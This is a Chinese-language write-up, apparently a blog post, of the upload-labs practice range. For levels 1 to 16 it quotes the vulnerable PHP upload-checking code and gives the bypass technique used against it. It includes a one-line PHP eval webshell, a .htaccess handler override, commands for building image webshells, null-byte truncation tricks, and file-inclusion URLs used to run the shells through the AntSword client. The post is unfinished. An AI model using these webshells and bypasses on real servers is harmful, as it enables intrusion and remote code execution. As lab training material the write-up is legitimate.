upload-labs文件上传漏洞靶场练习

news2024/12/22 20:04:38

任意文件上传靶场upload-labs下载地址

文章目录

      • Pass-01- 前端JS校验绕过
      • Pass-02- 文件类型MIME类型绕过
      • Pass-03- 文件名后缀黑名单绕过
      • Pass-04- .htaccess绕过
      • Pass-05- 文件名后缀大写绕过
      • Pass-06- 文件名后缀加空格绕过
      • Pass-07- 文件名后缀加点绕过
      • Pass-08-文件名后缀 ::$DATA绕过
      • Pass-09-文件名后缀拼接绕过
      • Pass-10-文件名后缀双写绕过
      • Pass-11- GET型00截断
      • Pass-12- POST型00截断
      • Pass-13- 文件内容头部绕过
      • Pass-14- getimagesize()检查绕过
      • Pass-15- exif_imagetype()检测绕过
      • Pass-16- 二次渲染绕过

Pass-01- 前端JS校验绕过

尝试上传一句话木马

<?php @eval($_REQUEST[6868])?>

image-20230830130722553

代码审计:

function checkFile() {
    var file = document.getElementsByName('upload_file')[0].value;
    if (file == null || file == "") {
        alert("请选择要上传的文件!");
        return false;
    }
    //定义允许上传的文件类型
    var allow_ext = ".jpg|.png|.gif";
    //提取上传文件的类型
    var ext_name = file.substring(file.lastIndexOf("."));
    //判断上传文件类型是否允许上传
    if (allow_ext.indexOf(ext_name + "|") == -1) {
        var errMsg = "该文件不允许上传,请上传" + allow_ext + "类型的文件,当前文件类型为:" + ext_name;
        alert(errMsg);
        return false;
    }
}

做了白名单策略,只允许.jpg|.png|.gif后缀的文件

绕过方式:

前端校验一文不值,删除js校验代码onsubmit="return checkFile()

image-20230830130937527

Pass-02- 文件类型MIME类型绕过

代码审计:

$is_upload = false;
$msg = null;
if (isset($_POST['submit'])) {
    if (file_exists(UPLOAD_PATH)) {
        if (($_FILES['upload_file']['type'] == 'image/jpeg') || ($_FILES['upload_file']['type'] == 'image/png') || ($_FILES['upload_file']['type'] == 'image/gif')) {
            $temp_file = $_FILES['upload_file']['tmp_name'];
            $img_path = UPLOAD_PATH . '/' . $_FILES['upload_file']['name']            
            if (move_uploaded_file($temp_file, $img_path)) {
                $is_upload = true;
            } else {
                $msg = '上传出错!';
            }
        } else {
            $msg = '文件类型不正确,请重新上传!';
        }
    } else {
        $msg = UPLOAD_PATH.'文件夹不存在,请手工创建!';
    }
}

绕过方式:

文件类型绕过

修改Content-Type

image-20230830131659244

Pass-03- 文件名后缀黑名单绕过

代码审计:

做了黑名单策略

$is_upload = false;
$msg = null;
if (isset($_POST['submit'])) {
    if (file_exists(UPLOAD_PATH)) {
        $deny_ext = array('.asp','.aspx','.php','.jsp');
        $file_name = trim($_FILES['upload_file']['name']);
        $file_name = deldot($file_name);//删除文件名末尾的点
        $file_ext = strrchr($file_name, '.');
        $file_ext = strtolower($file_ext); //转换为小写
        $file_ext = str_ireplace('::$DATA', '', $file_ext);//去除字符串::$DATA
        $file_ext = trim($file_ext); //收尾去空

        if(!in_array($file_ext, $deny_ext)) {
            $temp_file = $_FILES['upload_file']['tmp_name'];
            $img_path = UPLOAD_PATH.'/'.date("YmdHis").rand(1000,9999).$file_ext;            
            if (move_uploaded_file($temp_file,$img_path)) {
                 $is_upload = true;
            } else {
                $msg = '上传出错!';
            }
        } else {
            $msg = '不允许上传.asp,.aspx,.php,.jsp后缀文件!';
        }
    } else {
        $msg = UPLOAD_PATH . '文件夹不存在,请手工创建!';
    }
}

绕过方式:

image-20230830132050274

Pass-04- .htaccess绕过

代码审计:

做了黑名单策略

$is_upload = false;
$msg = null;
if (isset($_POST['submit'])) {
    if (file_exists(UPLOAD_PATH)) {
        $deny_ext = array(".php",".php5",".php4",".php3",".php2","php1",".html",".htm",".phtml",".pht",".pHp",".pHp5",".pHp4",".pHp3",".pHp2","pHp1",".Html",".Htm",".pHtml",".jsp",".jspa",".jspx",".jsw",".jsv",".jspf",".jtml",".jSp",".jSpx",".jSpa",".jSw",".jSv",".jSpf",".jHtml",".asp",".aspx",".asa",".asax",".ascx",".ashx",".asmx",".cer",".aSp",".aSpx",".aSa",".aSax",".aScx",".aShx",".aSmx",".cEr",".sWf",".swf");
        $file_name = trim($_FILES['upload_file']['name']);
        $file_name = deldot($file_name);//删除文件名末尾的点
        $file_ext = strrchr($file_name, '.');
        $file_ext = strtolower($file_ext); //转换为小写
        $file_ext = str_ireplace('::$DATA', '', $file_ext);//去除字符串::$DATA
        $file_ext = trim($file_ext); //收尾去空

        if (!in_array($file_ext, $deny_ext)) {
            $temp_file = $_FILES['upload_file']['tmp_name'];
            $img_path = UPLOAD_PATH.'/'.date("YmdHis").rand(1000,9999).$file_ext;
            if (move_uploaded_file($temp_file, $img_path)) {
                $is_upload = true;
            } else {
                $msg = '上传出错!';
            }
        } else {
            $msg = '此文件不允许上传!';
        }
    } else {
        $msg = UPLOAD_PATH . '文件夹不存在,请手工创建!';
    }
}

绕过方式:

上传.htaccess文件,内容如下

<FilesMatch "jpg">
Sethandler application/x-httpd-php 
</FilesMatch>

.htaccess会改变uploads这个目录下的文件解析规则, 调用php的解析器去解析一个文件名只需包含“jpg”字符串的任意文件

简单来说, 若一个文件的文件名为1.jpg, 其内容是phpinfo(), 那么apache就会调用php解析器去解析此文件

image-20230830135541957

再上传2.jpg, 文件内容如下:

<?php phpinfo();?>

image-20230830135710102

查看上传路径http://192.168.80.139/upload/2.jpg

image-20230830145045679

访问到图片里的php代码

image-20230830145114846

Pass-05- 文件名后缀大写绕过

代码审计:

$is_upload = false;
$msg = null;
if (isset($_POST['submit'])) {
    if (file_exists(UPLOAD_PATH)) {
        $deny_ext = array(".php",".php5",".php4",".php3",".php2",".html",".htm",".phtml",".pht",".pHp",".pHp5",".pHp4",".pHp3",".pHp2",".Html",".Htm",".pHtml",".jsp",".jspa",".jspx",".jsw",".jsv",".jspf",".jtml",".jSp",".jSpx",".jSpa",".jSw",".jSv",".jSpf",".jHtml",".asp",".aspx",".asa",".asax",".ascx",".ashx",".asmx",".cer",".aSp",".aSpx",".aSa",".aSax",".aScx",".aShx",".aSmx",".cEr",".sWf",".swf",".htaccess");
        $file_name = trim($_FILES['upload_file']['name']);
        $file_name = deldot($file_name);//删除文件名末尾的点
        $file_ext = strrchr($file_name, '.');
        $file_ext = str_ireplace('::$DATA', '', $file_ext);//去除字符串::$DATA
        $file_ext = trim($file_ext); //首尾去空

        if (!in_array($file_ext, $deny_ext)) {
            $temp_file = $_FILES['upload_file']['tmp_name'];
            $img_path = UPLOAD_PATH.'/'.date("YmdHis").rand(1000,9999).$file_ext;
            if (move_uploaded_file($temp_file, $img_path)) {
                $is_upload = true;
            } else {
                $msg = '上传出错!';
            }
        } else {
            $msg = '此文件类型不允许上传!';
        }
    } else {
        $msg = UPLOAD_PATH . '文件夹不存在,请手工创建!';
    }
}

相比上一关来说,把.htacces也进入了黑名单

image-20230830150045295

还没有做大小写转换

绕过方式:

我们可以把上传的木马文件后缀名改为大写

1.php改成1.PHP

上传文件,查看文件路径

image-20230830150641393

在地址栏中访问http://192.168.80.139/upload/202308301506064212.PHP

没有报错说明上传成功

这个时候可以使用蚁剑来连接

image-20230830150753110

进入目录管理

image-20230830150845243

Pass-06- 文件名后缀加空格绕过

代码审计:

代码中少了 trim($file_ext):该函数是将字符串首位的空格去除

$is_upload = false;
$msg = null;
if (isset($_POST['submit'])) {
    if (file_exists(UPLOAD_PATH)) {
        $deny_ext = array(".php",".php5",".php4",".php3",".php2",".html",".htm",".phtml",".pht",".pHp",".pHp5",".pHp4",".pHp3",".pHp2",".Html",".Htm",".pHtml",".jsp",".jspa",".jspx",".jsw",".jsv",".jspf",".jtml",".jSp",".jSpx",".jSpa",".jSw",".jSv",".jSpf",".jHtml",".asp",".aspx",".asa",".asax",".ascx",".ashx",".asmx",".cer",".aSp",".aSpx",".aSa",".aSax",".aScx",".aShx",".aSmx",".cEr",".sWf",".swf",".htaccess");
        $file_name = $_FILES['upload_file']['name'];
        $file_name = deldot($file_name);//删除文件名末尾的点
        $file_ext = strrchr($file_name, '.');
        $file_ext = strtolower($file_ext); //转换为小写
        $file_ext = str_ireplace('::$DATA', '', $file_ext);//去除字符串::$DATA
        
        if (!in_array($file_ext, $deny_ext)) {
            $temp_file = $_FILES['upload_file']['tmp_name'];
            $img_path = UPLOAD_PATH.'/'.date("YmdHis").rand(1000,9999).$file_ext;
            if (move_uploaded_file($temp_file,$img_path)) {
                $is_upload = true;
            } else {
                $msg = '上传出错!';
            }
        } else {
            $msg = '此文件不允许上传';
        }
    } else {
        $msg = UPLOAD_PATH . '文件夹不存在,请手工创建!';
    }
}

绕过方式:

image-20230830153129061

Pass-07- 文件名后缀加点绕过

代码审计:

$is_upload = false;
$msg = null;
if (isset($_POST['submit'])) {
    if (file_exists(UPLOAD_PATH)) {
        $deny_ext = array(".php",".php5",".php4",".php3",".php2",".html",".htm",".phtml",".pht",".pHp",".pHp5",".pHp4",".pHp3",".pHp2",".Html",".Htm",".pHtml",".jsp",".jspa",".jspx",".jsw",".jsv",".jspf",".jtml",".jSp",".jSpx",".jSpa",".jSw",".jSv",".jSpf",".jHtml",".asp",".aspx",".asa",".asax",".ascx",".ashx",".asmx",".cer",".aSp",".aSpx",".aSa",".aSax",".aScx",".aShx",".aSmx",".cEr",".sWf",".swf",".htaccess");
        $file_name = trim($_FILES['upload_file']['name']);
        $file_ext = strrchr($file_name, '.');
        $file_ext = strtolower($file_ext); //转换为小写
        $file_ext = str_ireplace('::$DATA', '', $file_ext);//去除字符串::$DATA
        $file_ext = trim($file_ext); //首尾去空
        
        if (!in_array($file_ext, $deny_ext)) {
            $temp_file = $_FILES['upload_file']['tmp_name'];
            $img_path = UPLOAD_PATH.'/'.$file_name;
            if (move_uploaded_file($temp_file, $img_path)) {
                $is_upload = true;
            } else {
                $msg = '上传出错!';
            }
        } else {
            $msg = '此文件类型不允许上传!';
        }
    } else {
        $msg = UPLOAD_PATH . '文件夹不存在,请手工创建!';
    }
}

少了deldot函数

$file_name = deldot($file_name);//删除文件名末尾的点

绕过方式:

在文件后缀后面加个.

image-20230830154310217

Pass-08-文件名后缀 ::$DATA绕过

代码审计:

$is_upload = false;
$msg = null;
if (isset($_POST['submit'])) {
    if (file_exists(UPLOAD_PATH)) {
        $deny_ext = array(".php",".php5",".php4",".php3",".php2",".html",".htm",".phtml",".pht",".pHp",".pHp5",".pHp4",".pHp3",".pHp2",".Html",".Htm",".pHtml",".jsp",".jspa",".jspx",".jsw",".jsv",".jspf",".jtml",".jSp",".jSpx",".jSpa",".jSw",".jSv",".jSpf",".jHtml",".asp",".aspx",".asa",".asax",".ascx",".ashx",".asmx",".cer",".aSp",".aSpx",".aSa",".aSax",".aScx",".aShx",".aSmx",".cEr",".sWf",".swf",".htaccess");
        $file_name = trim($_FILES['upload_file']['name']);
        $file_name = deldot($file_name);//删除文件名末尾的点
        $file_ext = strrchr($file_name, '.');
        $file_ext = strtolower($file_ext); //转换为小写
        $file_ext = trim($file_ext); //首尾去空
        
        if (!in_array($file_ext, $deny_ext)) {
            $temp_file = $_FILES['upload_file']['tmp_name'];
            $img_path = UPLOAD_PATH.'/'.date("YmdHis").rand(1000,9999).$file_ext;
            if (move_uploaded_file($temp_file, $img_path)) {
                $is_upload = true;
            } else {
                $msg = '上传出错!';
            }
        } else {
            $msg = '此文件类型不允许上传!';
        }
    } else {
        $msg = UPLOAD_PATH . '文件夹不存在,请手工创建!';
    }
}

$file_ext = str_ireplace('::$DATA', '', $file_ext);//去除字符串::$DATA

在window的时候如果文件名+"::$DATA"会把::$DATA之后的数据当成文件流处理,不会检测后缀名,且保持::$DATA之前的文件名,他的目的就是不检查后缀名

漏洞绕过:

在上传文件名后面加上 ::$DATA,这样就不会 检测我们上传的文件后缀是什么了

image-20230830155002397

Pass-09-文件名后缀拼接绕过

代码审计:

$is_upload = false;
$msg = null;
if (isset($_POST['submit'])) {
    if (file_exists(UPLOAD_PATH)) {
        $deny_ext = array(".php",".php5",".php4",".php3",".php2",".html",".htm",".phtml",".pht",".pHp",".pHp5",".pHp4",".pHp3",".pHp2",".Html",".Htm",".pHtml",".jsp",".jspa",".jspx",".jsw",".jsv",".jspf",".jtml",".jSp",".jSpx",".jSpa",".jSw",".jSv",".jSpf",".jHtml",".asp",".aspx",".asa",".asax",".ascx",".ashx",".asmx",".cer",".aSp",".aSpx",".aSa",".aSax",".aScx",".aShx",".aSmx",".cEr",".sWf",".swf",".htaccess");
        $file_name = trim($_FILES['upload_file']['name']);
        $file_name = deldot($file_name);//删除文件名末尾的点
        $file_ext = strrchr($file_name, '.');
        $file_ext = strtolower($file_ext); //转换为小写
        $file_ext = str_ireplace('::$DATA', '', $file_ext);//去除字符串::$DATA
        $file_ext = trim($file_ext); //首尾去空
        
        if (!in_array($file_ext, $deny_ext)) {
            $temp_file = $_FILES['upload_file']['tmp_name'];
            $img_path = UPLOAD_PATH.'/'.$file_name;
            if (move_uploaded_file($temp_file, $img_path)) {
                $is_upload = true;
            } else {
                $msg = '上传出错!';
            }
        } else {
            $msg = '此文件类型不允许上传!';
        }
    } else {
        $msg = UPLOAD_PATH . '文件夹不存在,请手工创建!';
    }
}

代码先是去除文件名前后的空格,再去除文件名末尾的.,再通过strrchar函数来寻找.来确认文件名的后缀,但是最后保存文件的时候没有重命名而使用的原始的文件名,导致可以利用1.php. .(点+空格+点)来绕过

绕过方式:

上传1.php文件,bp抓包修改文件名后缀1.php. .

使用. .绕过,首先删除一个点,再首尾去空,该文件还是会以.结尾

image-20230830165444606

Pass-10-文件名后缀双写绕过

代码审计:

$is_upload = false;
$msg = null;
if (isset($_POST['submit'])) {
    if (file_exists(UPLOAD_PATH)) {
        $deny_ext = array("php","php5","php4","php3","php2","html","htm","phtml","pht","jsp","jspa","jspx","jsw","jsv","jspf","jtml","asp","aspx","asa","asax","ascx","ashx","asmx","cer","swf","htaccess");
        $file_name = trim($_FILES['upload_file']['name']);
        $file_name = str_ireplace($deny_ext,"", $file_name);
        $temp_file = $_FILES['upload_file']['tmp_name'];
        $img_path = UPLOAD_PATH.'/'.$file_name;        
        if (move_uploaded_file($temp_file, $img_path)) {
            $is_upload = true;
        } else {
            $msg = '上传出错!';
        }
    } else {
        $msg = UPLOAD_PATH . '文件夹不存在,请手工创建!';
    }
}

将文件名进行过滤操作后,将文件名拼接在路径后面,所以需要绕 过前面的首尾去空以及去点

绕过方式:

修改上传的文件后缀为:1.pphphp

image-20230830171549011

Pass-11- GET型00截断

00截断原理:

​ 0x00是十六进制表示方法,是ascii码为0的字符,在有些函数处理时,会把这个字符当做结束符。

​ 系统在对文件名的读取时,如果遇到0x00,就会认为读取已结束。

​ 可以通过00截断,绕过对应的白名单验证

​ 1.php0x00.jpg

代码审计:

$is_upload = false;
$msg = null;
if(isset($_POST['submit'])){
    $ext_arr = array('jpg','png','gif');
    $file_ext = substr($_FILES['upload_file']['name'],strrpos($_FILES['upload_file']['name'],".")+1);
    if(in_array($file_ext,$ext_arr)){
        $temp_file = $_FILES['upload_file']['tmp_name'];
        $img_path = $_GET['save_path']."/".rand(10, 99).date("YmdHis").".".$file_ext;

        if(move_uploaded_file($temp_file,$img_path)){
            $is_upload = true;
        } else {
            $msg = '上传出错!';
        }
    } else{
        $msg = "只允许上传.jpg|.png|.gif类型文件!";
    }
}

白名单过滤,只允许('jpg','png','gif')后缀的文件

image-20230830194758382

GET型提交的内容会被 自动进行URL解码

绕过方式:

上传2.jpg里面内容是<?php phpinfo();?>

image-20230830193636706

image-20230830193657470

图片上传成功,右键复制图像 链接

image-20230830193718264

发现地址中有乱码

image-20230830193802039

去掉2.php后面 的参数,访问到php探针

image-20230830194026456

Pass-12- POST型00截断

代码审计:

$is_upload = false;
$msg = null;
if(isset($_POST['submit'])){
    $ext_arr = array('jpg','png','gif');
    $file_ext = substr($_FILES['upload_file']['name'],strrpos($_FILES['upload_file']['name'],".")+1);
    if(in_array($file_ext,$ext_arr)){
        $temp_file = $_FILES['upload_file']['tmp_name'];
        $img_path = $_POST['save_path']."/".rand(10, 99).date("YmdHis").".".$file_ext;

        if(move_uploaded_file($temp_file,$img_path)){
            $is_upload = true;
        } else {
            $msg = "上传失败";
        }
    } else {
        $msg = "只允许上传.jpg|.png|.gif类型文件!";
    }
}

同样的白名单策略,与上一关不同的是,这次换成了$_POST

image-20230830194947171

在POST请求中,%00不会被自动解码,需要在16进制中修改为00

绕过方式:

image-20230830195244759

image-20230830195434438

image-20230830195455115

修改完成后点击Forward放包,上传成功!

复制图像链接

image-20230830195722660

http://127.0.0.1/upload/2.php%EF%BF%BD/7520230830195703.jpg

去掉后面多余的参数

http://127.0.0.1/upload/2.php

image-20230830195820783

Pass-13- 文件内容头部绕过

代码审计:

image-20230830201054731

绕过方式:

shell.php内容

<?php @eval($_REQUEST[6868])?>

image-20230830201527499

图片木马制作:

windows:
	copy 1.jpg /b + 1.php /a 2.jpg
Linux:
	cat 1.jpg shell.php > shell.jpg

image-20230830201455021

图片上传成功

image-20230830201747393

查看上传路径

image-20230830201910430

图片的上传路径/upload/6720230830201732.jpg

image-20230830202333851

结合文件包含漏洞执行图片木马

http://127.0.0.1/include.php?file=./upload/6720230830201732.jpg

蚁剑连接

image-20230830202916275

Pass-14- getimagesize()检查绕过

代码审计:

image-20230830203339475

getimagesize()函数对文件内容头部做检查

绕过方式:

1、图片木马

2、上传php木马,修改文件内容

image-20230830203812922

图片上传路径upload/1820230830203805.gif

要想触发木马,需要结合文件包含 来实现

http://127.0.0.1/include.php?file=./upload/1820230830203805.gif

image-20230830204029159

蚁剑连接

image-20230830204008577

Pass-15- exif_imagetype()检测绕过

代码审计:

image-20230830204441884

exif_imagetype — 判断一个图像的类型是否为图片文件

绕过方式:

生成图片木马绕过函数检测,利用文件包含漏洞连接webshell

Pass-16- 二次渲染绕过

该php代码中允许上传图片,但会对图片进行二次渲染,因此我们需要绕过二次渲染的部分,也就是在在二次渲染不会改变的部分加入我们需要的php木马的代码

满足move_uploaded_file就可以上传成功!!!

绕过方式:

先上传一张普通的jpg图片,然后图片另存为,这个时候该图片已经被渲染了

然后后渲染后的图片,制作图片木马

copy 20728.jpg /b +shell.php /a webshell.jpg

image-20230830211544779

上传图片,查看图片路径

image-20230830212049014

使用文件包含http://127.0.0.1/include.php?file=upload/11907.jpg

蚁剑连接发现不起作用

未完。。。。。。。。。。。。。。。。。。。。。。。。。。。

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.coloradmin.cn/o/950449.html

如若内容造成侵权/违法违规/事实不符,请联系多彩编程网进行投诉反馈,一经查实,立即删除!

相关文章

控制goroutine 的并发执行数量

goroutine的数量上限是1048575吗&#xff1f; 正常项目&#xff0c;协程数量超过十万就需要引起重视。如果有上百万goroutine&#xff0c;一般是有问题的。 但并不是说协程数量的上限是100多w 1048575的来自类似如下的demo代码: package mainimport ( "fmt" "ma…

SpringMVC使用

文章目录 一.MVC基础概念1.MVC定义2.SpringMVC和MVC的关系 二.SpringMVC的使用1.RequestMapping2.获取参数1.获取单个参数2.传递对象3.后端参数重命名&#xff08;后端参数映射&#xff09;4.获取URL中参数PathVariable5.上传文件RequestPart6.获取Cookie/Session/header 3.返回…

电视盒子什么牌子好?经销商整理线下热销电视盒子品牌排行榜

在面对众多品牌和型号时&#xff0c;不知道电视盒子哪个牌子好的消费者超多&#xff0c;很多人进店都会问我电视盒子哪款好&#xff1f;我根据店铺内近两年的销量情况整理了电视盒子品牌排行榜&#xff0c;看看实体店哪些电视盒子最值得入手吧。 TOP 1.泰捷WEBOX 40Pro Max电视…

案例实操-获取员工数据

案例&#xff1a;获取员工数据&#xff0c;返回统一响应结果&#xff0c;在页面渲染展示 package com.bignyi.controller;import com.bignyi.pojo.Emp; import com.bignyi.pojo.Result; import com.bignyi.utils.XmlParserUtils; import org.springframework.web.bind.annotat…

分享一个在线二维码生成器(基于qrcode.js开发)

一种二维码扫描与生成的工具, 它可生成个性化二维码, 支持文本、网址、图片、短信、电话等格式及主题,提供融合码功能 演示地址 https://qrcode.gitapp.cn 关键代码 var qrcode new QRCode(document.getElementById("qrcode"), {text: "",width: 288,h…

2023下半年西安/北京/深圳NPDP产品经理国际认证开班啦

产品经理国际资格认证NPDP是新产品开发方面的认证&#xff0c;集理论、方法与实践为一体的全方位的知识体系&#xff0c;为公司组织层级进行规划、决策、执行提供良好的方法体系支撑。 【认证机构】 产品开发与管理协会&#xff08;PDMA&#xff09;成立于1979年&#xff0c;是…

【JavaSE】Java快速入门

Java main 函数 public class Main {public static void main(String[] args) { System.out.printf("Hello and welcome!");} }与C命名规范不同&#xff0c;Java 的命名形式最好使用驼峰法 Java 注释 C/C常用的两种注释习惯Java都可以使用&#xff0c;Java自身…

【HASH值获取】

命令行输入&#xff1a;C:\Users\Administrator>certutil -hashfile SIC-1000.exe md5

2、[春秋云镜]CVE-2022-30887

文章目录 一、靶标介绍二、复现过程 一、靶标介绍 二、复现过程 &#xff08;1&#xff09;打开网址。 &#xff08;2&#xff09;查看源代码 邮件格式&#xff1a;第一个符号不准为&#xff0c;后续符号有、.&#xff1b; 密码格式&#xff1a;匹配所有小写字母&#xff0c…

数组 刷题常用

在写数组模拟常用到数组&#xff0c;借此把常用的记下来以便查阅 一维数组&#xff0c;若初始化为0&#xff0c;可以用int a[N] {0}或者int a[N]{}. 但是若是其他值&#xff0c;不可类似地初始化为int a[N] {0}&#xff0c;而应写成memset或者fill赋值的方法。 首先便是二维…

康希诺的再估值:市场到底,行业向上

生物医药是整个二级市场弹性数一数二&#xff0c;但拐点难以揣摩的行业。这一点&#xff0c;美港A三大市场都曾经有过足够多的暴涨暴跌案例可用于佐证。 但很多时候&#xff0c;这种片面的表现又掩盖了生物医药自身的永续价值&#xff1a;在绝大多数细分赛道上&#xff0c;任何…

激活Conda环境并在pycharm使用

第一步&#xff1a;打开Anaconda Prompt 第二步&#xff1a;查看当前存在的虚拟环境 conda env list 第三步&#xff1a;创建虚拟环境 conda create -n 环境名 pythonX.X.X 如果不清楚python版本&#xff0c;可以用以下命令查看&#xff1a; 第四步&#xff1a;激活指定虚拟环…

客户案例|MemFire Cloud助推应急管理业务,打造百万级数据可视化大屏

「导语」 硬石科技&#xff0c;成立于2018年&#xff0c;总部位于武汉&#xff0c;是一家专注于应急管理行业和物联感知预警算法模型的技术核心的物联网产品和解决方案提供商。硬石科技作为一家高新技术企业&#xff0c;持有6项发明专利&#xff0c;拥有100余项各类平台认证和资…

nginx+tomcat部署的项目,上传文件成功,但请求文件报403 forbidden

这是因为上传文件时tomcat创建的目录、文件&#xff0c;nginx没有权限访问导致。 最快的解决方法是修改$tomcat_home/bin/catalina.sh 修改之后记得重启tocmat 参考&#xff1a; https://www.cnblogs.com/mgds/p/16129039.html

解读未知:文本识别算法的突破与实际应用

解读未知&#xff1a;文本识别算法的突破与实际应用 1.文本识别算法理论 背景介绍 文本识别是OCR&#xff08;Optical Character Recognition&#xff09;的一个子任务&#xff0c;其任务为识别一个固定区域的的文本内容。在OCR的两阶段方法里&#xff0c;它接在文本检测后面…

攻防世界-Erik-Baleog-and-Olaf

原题 解题思路 文件名就说了stego&#xff0c;改成图片后缀再用stegslove打开。 扫码即可

十二、集合(3)

本章概要 迭代器 Iterators ListIterator 链表 LinkedList堆栈 Stack 迭代器Iterators 在任何集合中&#xff0c;都必须有某种方式可以插入元素并再次获取它们。毕竟&#xff0c;保存事物是集合最基本的工作。对于 List &#xff0c; add() 是插入元素的一种方式&#xff0c…

【sgTransfer】自定义组件:带有翻页、页码、分页器的穿梭框组件,支持大批量数据的穿梭显示。

特性&#xff1a; 表格宽度可以自定义翻页器显示控件可以自定义列配置项可以设置显示字段列名称、宽度、字段名可以配置搜索框提示文本&#xff0c;支持搜索过滤穿梭框顶部标题可以自定义左右箭头按钮文本可以设置 sgTransfer源码 <template><div :class"$opti…

渲染如何做到超强渲染?MAX插件CG MAGIC中的渲染功能!

渲染工作应该算是设计师的日常工作流程中最重要的环节之一了。如果渲染速度加快&#xff0c;可能是要看渲染技巧掌握的有多少了。 大家熟悉的3d Max本地渲染通道&#xff0c;对于CG MAGIC渲染功能你也一定不能错过&#xff0c;要知道操作简单易使用&#xff0c;就完全拿捏了效率…